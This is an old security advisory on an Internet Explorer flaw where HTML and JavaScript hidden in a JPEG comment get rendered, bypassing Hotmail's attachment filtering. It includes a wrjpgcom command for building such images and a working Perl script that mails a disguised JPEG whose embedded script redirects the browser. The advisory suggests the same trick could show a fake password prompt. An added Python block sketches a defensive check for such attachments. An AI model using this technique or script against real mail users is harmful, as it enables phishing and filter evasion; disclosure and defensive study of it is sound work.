Vulnerability: IE
Affected: IE

Description:

Kee Hinckley found the following. Internet Explorer 5.0 on the Mac and 4.0 on Windows both have the problem. IE 5 on Windows did not seem vulnerable; however, it also didn't display the test image correctly, so there may still be issues.

First, Internet Explorer has a "feature" which makes it possible to cause it to display arbitrary HTML that is embedded in an image (or any other type of file). Second, Hotmail at least, and most likely all other web-based mail systems, does not filter out HTML hidden in images (one can hardly blame them). As a result, the JavaScript and CSS spoofing attacks previously described on this list can be used against a Macintosh Hotmail user, and Hotmail will *not* filter out offending HTML, JavaScript or CSS tags. This technique may also work against some virus scanners.

When IE reads a file from the web, it doesn't trust the Content-Type or file ending; instead it examines the first 256 bytes of the file to see if it recognizes the file type. Apparently this is considered a feature, although it has caused no end of pain to web designers who are trying to assign a different download behavior to a particular file. The problem does not occur when the file is read from the disk.

The parser that IE uses is not terribly sophisticated. If it sees one of several common HTML tags in the first 256 bytes, it will assume that the file is an HTML file, even if the rest of it is binary garbage. Since it is possible to embed comments in a number of types of files, and those comments often occur close to the beginning of the file, it is trivial to convince IE that an image file is in fact an HTML file. Viewing this file from inside an HTML page (i.e. in an img tag) will show a broken image in IE5 on the Mac and Windows, although IE4 on Windows shows the image correctly. However, opening it directly in the browser will result in some garbage characters, followed by the interpreted HTML content.
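The check a mail gateway or upload handler would want here is to look at an attachment the way the sniffing browser does: scan the first 256 bytes for HTML tags regardless of the declared Content-Type, and, for JPEGs, walk the marker segments to see whether the tag sits in a COM (comment) segment. This is an added example, not part of the original advisory or of IE; the tag list it keys on and the sample JPEG-shaped inputs are constructed assumptions, since the page only says IE looks for "several common HTML tags".

```python
import re
import struct

SNIFF_WINDOW = 256
# Tags the check keys on. The page says IE looks for "several common HTML
# tags"; this particular list is an assumption, not IE's actual table.
HTML_TAG_RE = re.compile(rb"<\s*(html|head|body|script|title|table|img|iframe|a)\b",
                         re.IGNORECASE)

def looks_like_html(data: bytes, window: int = SNIFF_WINDOW) -> bool:
    """Approximate the sniffing rule: any HTML tag within the first `window` bytes."""
    return HTML_TAG_RE.search(data[:window]) is not None

def jpeg_comments(data: bytes) -> list:
    """Walk the JPEG marker segments and return each COM (0xFFFE) payload."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI marker")
    comments, pos = [], 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI, or SOS: entropy-coded data follows, stop here
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]  # includes the 2 length bytes
        if marker == 0xFE:
            comments.append(data[pos + 4:pos + 2 + length])
        pos += 2 + length
    return comments

def assess_attachment(data: bytes, declared_type: str) -> dict:
    """Flag an attachment whose declared image type disagrees with what a sniffing browser sees."""
    sniffs = looks_like_html(data)
    in_comment = False
    if data[:2] == b"\xff\xd8":
        in_comment = any(looks_like_html(c, len(c)) for c in jpeg_comments(data))
    return {
        "declared_type": declared_type,
        "sniffs_as_html": sniffs,
        "html_in_comment": in_comment,
        "block": declared_type.lower().startswith("image/") and sniffs,
    }

def build_sample_jpeg(comment: bytes) -> bytes:
    """Constructed test input: SOI, one COM segment, EOI (not a decodable image)."""
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + com + b"\xff\xd9"

# Constructed samples: a harmless comment and one carrying an HTML tag up front.
CLEAN = build_sample_jpeg(b"Created with a camera")
SUSPECT = build_sample_jpeg(b"<html><body>test</body></html>")
```

A tag that first appears beyond the 256-byte window is not flagged by `looks_like_html`, which matches the page's observation that a comment placed too far from the start of the file did not trigger the behaviour.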
To create a commented JPG file with embedded HTML, try a command such as this on a Unix box:

djpeg sample.jpg | cjpeg | wrjpgcom -cfile cfile > html.jpg

where 'cfile' is a file containing the HTML. You may not need the djpeg/cjpeg combo, but my first attempt just using wrjpgcom didn't put the comment close enough to the beginning of the file.

Hotmail can be persuaded to treat an image as an attachment by giving the file a non-standard Content-Type. Since Hotmail doesn't know that the browser is going to interpret an arbitrary attachment as an HTML file, it doesn't filter the content of the file. Clicking on the attachment will cause Hotmail to scan the attachment for viruses and then ask you if you would like to download it. When you click on the download button, the window will be replaced for a brief moment with garbage characters (the raw JPG) and then the HTML will be displayed. In the case of a JavaScript or CSS exploit, the code would presumably replace the page of garbage characters with a password prompt or other item. The user would not unreasonably assume that something had gone wrong with the software and that their session had expired.

This vulnerability was originally discovered by Anders Pearson and Peter Leonard of the Columbia Center for New Media Teaching and Learning. They ran into it when they were attempting to embed XML in image comments. Kee heard about it from a discussion on the WebDesign mailing list and wrote a test exploit (enclosed below) to see if Hotmail users were in fact vulnerable.

The following Perl script will email a small JPG image to a user. In order to ensure that the file is treated as an attachment and not displayed inline, the script gives the file the content type "image/jpg" instead of the proper "image/jpeg". If you mail this to a Mac IE Hotmail user, and they attempt to download the attached image, it will redirect their browser to another web site (the enclosed script uses http://www.spamwatcher.com/).
Although embedding the HTML in an image makes it more likely to pass through filters, there is nothing inherent in this process that requires that it be an image. The user's expectation that they will be viewing an image file helps from a social engineering context, but even a text file that has been given a different Content-Type might pass through filters. The key issue is that the browser thinks it knows more about the file than the person who sent it, and that it is executing HTML code when the user is expecting it to download a file, before they expect to have to worry about the file's content.

#!/usr/bin/perl
# sendit.pl
#
# Sends a JPG image (with a false content type) to the destination email
# address. The JPG contains an embedded HTML comment which will
# cause some versions of Internet Explorer to interpret the file as though
# it were HTML, executing the contained JavaScript and redirecting the browser to
# http://www.spamwatcher.com/.
#
# The HTML in the comment is:
#<html><head><title>foo</title><script>document.location.replace('http://www.spamwatcher.com/')</script></head><body>test</body></html>
#

use strict;
use warnings;
use Net::SMTP;

die("Use: $0 from to\n") if (!$ARGV[1]);

sendit($ARGV[0], $ARGV[1]);

sub sendit {
    my ($from, $to) = @_;
    my $smtp;

    # Talk to the local MTA; Net::SMTP->new returns undef if it cannot connect.
    $smtp = Net::SMTP->new('localhost')
        or die("Cannot connect to SMTP server on localhost\n");
    $smtp->mail($from);   # envelope sender (the original passed $to here by mistake)
    $smtp->to($to);       # envelope recipient
    $smtp->data();
    $smtp->datasend("To: $to\n");
    $smtp->datasend("From: $from\n");
    $smtp->datasend("Subject: Test of html.jpg\n");
    # Deliberately "image/jpg" rather than "image/jpeg" so Hotmail offers it as a download.
    $smtp->datasend("Content-Type: image/jpg\n");
    $smtp->datasend("Content-Transfer-Encoding: base64\n");
    $smtp->datasend("Content-Disposition: attachment; filename=html.jpg\n");
    $smtp->datasend("\n");
    # The base64-encoded JPG (commented with the HTML shown above); the
    # here-doc terminator must stay at the start of its line.
    $smtp->datasend(<<X);
/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRof
Hh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwh
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL//gCJ
PGh0bWw+PGhlYWQ+PHRpdGxlPmZvbzwvdGl0bGU+PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlv
bi5yZXBsYWNlKCdodHRwOi8vd3d3LnNwYW13YXRjaGVyLmNvbS8nKTwvc2NyaXB0PjwvaGVh
ZD48Ym9keT50ZXN0PC9ib2R5PjwvaHRtbD4K/8AAEQgBQADwAwEiAAIRAQMRAf/EAB8AAAEF
AQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUS
ITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZH
SElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqy
s7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+v/EAB8BAAMB
AQEBAQEBAQEAAAAAAAABAgMEBQYHCAkKC//EALURAAIBAgQEAwQHBQQEAAECdwABAgMRBAUh
MQYSQVEHYXETIjKBCBRCkaGxwQkjM1LwFWJy0QoWJDThJfEXGBkaJicoKSo1Njc4OTpDREVG
R0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoKDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ip
qrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uLj5OXm5+jp6vLz9PX29/j5+v/aAAwDAQAC
EQMRAD8A8cooor9xPNCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK
KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA
ooooAKKKKACiiigAooooAKKKKACiiii4BRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUU
UUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFd34pl1CxufENjqen+TZ+Z5VhbCOFlsGaSOVQ
AhIi3RbsleHIOdxUkcJXo3jW/ub/AMKQXFw6KXv9u0XtlOJCFdiwNvGrEhpWLbiADIDhi5I8
TMLrE0FZNNvrqndPT7jSGzPOaKKK9szCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo
oAKKKKACiiigAooooAKKKKACiiigArv/ABlLpkfhu1g0/VbaaZrthcQW9vaokxiaSNZQYVVl
GPmCvkETDaTtY1wFdr4ssdSsNPnstQg0eSS1vVU3enWscIOUYBSViXeMpIowflaOQMCdmPFx
8VLE0LvZt9PLuu9uvpqaQ2ZxVFFFe0ZhRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUU
UAFFFFABRRRQAUUUUAFFFFABRRRQAV0us/8ACRz6eW1XW0vreJlfy21qK5IP3QwQSMSeTyBw
Ce2a5qul8SeKItdWVYtNS1WW7e6JMgkYMxZmwwA5JcgnHKxwj/lnlvNxSqutT5IJrW7fTbbX
r8ylazOaooor0iQooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK
ACiiigAooooAK7/xvqMesaW+owavc3kUl+S1udRmnigYhmAWN7eMIMEhSWOQGABwSOAr0bx5
d2ep6VLe6bq99eaf9vVIInkvJY4/3bhgzTDaWwEYAEEebIp3KqtXh5il9aoNp7vXottHp16b
GkPhZ5zRRRXuGYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFA
BRRRQAUUUUAFehePvD+p6Xp8Qv2+1w2MsVja38lq0DPCEfaigMVKqyS5JXdjYwZlcY89rsfE
Wm22nWEyPZaLa3IYIFii1JJsjaxCicBMhWUkHswI5IrxcdJrE0bN7vS1+2t7pr8TSGzOOooo
r2jMKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK
ACvU/iO/+gXgvEkhvJL8BnOmPAbpot4Dh5Lht0eJXwVU4ARTtBQHyyu/8YaBY6L4etriK00t
LmeZ7eRY0uVeNo5GRjGXmZZF3RMCSAQGQkKWGPCzJReLw/M2nd2SSd9t30RpD4WcBRRRXumY
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA
UUUUAFFFFABRRRQB/9k=
X
    $smtp->dataend();   # terminate the DATA section before quitting
    $smtp->quit();
}

Solution: Nothing yet.